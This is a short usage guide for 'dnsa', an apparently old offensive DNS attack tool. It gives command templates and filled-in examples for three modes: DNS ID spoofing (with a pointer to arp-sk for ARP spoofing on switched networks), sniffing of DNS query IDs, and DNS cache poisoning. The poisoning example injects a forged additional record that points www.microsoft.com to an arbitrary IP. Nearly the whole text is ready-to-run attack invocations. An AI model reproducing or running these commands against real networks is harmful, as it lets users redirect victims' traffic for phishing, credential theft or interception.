DNS ID Spoofing :
-----------------
[ If you want to use it on switched networks, you'll need to use a tool to make arp spoofing. I recommand you arp-sk (http://www.arp-sk.org) which is the greater ! ;) ]
	./dnsa -1 -D the_FQDN_you_want_to_reply_to.org -S IP_TO_SEND -s HOST_TO_FOOL -i INTERFACE

==>	./dnsa -1 -D www.the_one.org -S 1.2.3.4 -s 192.168.0.1 -i eth0

DNS Sniffing (Needs to be improved) :
-----------------------------------
[ For the moment, it justs sniff DNS IDs, but doesn't do anything. We are actually working on prediction. ]
	./dnsa -2 -s HOST_TO_SNIFF -w file_to_store_IDs

==>	./dnsa -2 -s 192.168.0.1 -w IDs_of_192.168.0.1

DNS cache poisoning :
---------------------
	./dnsa -3 -D the_host_IP_which_is_asked_for -S normal_host_IP -s DNS_server_which_is_doing_the_request -a host_in_additional_record -b ip_in_the_additional_record -i INTERFACE

==>	./dnsa -3 -D hacker.pirate.org -S 100.101.102.103 -s 194.117.200.10 -a www.microsoft.com -b 1.2.3.4 -i eth0



--
If you need help, contact me : 
	Pierre BETOUIN
	soulrider@ifrance.com
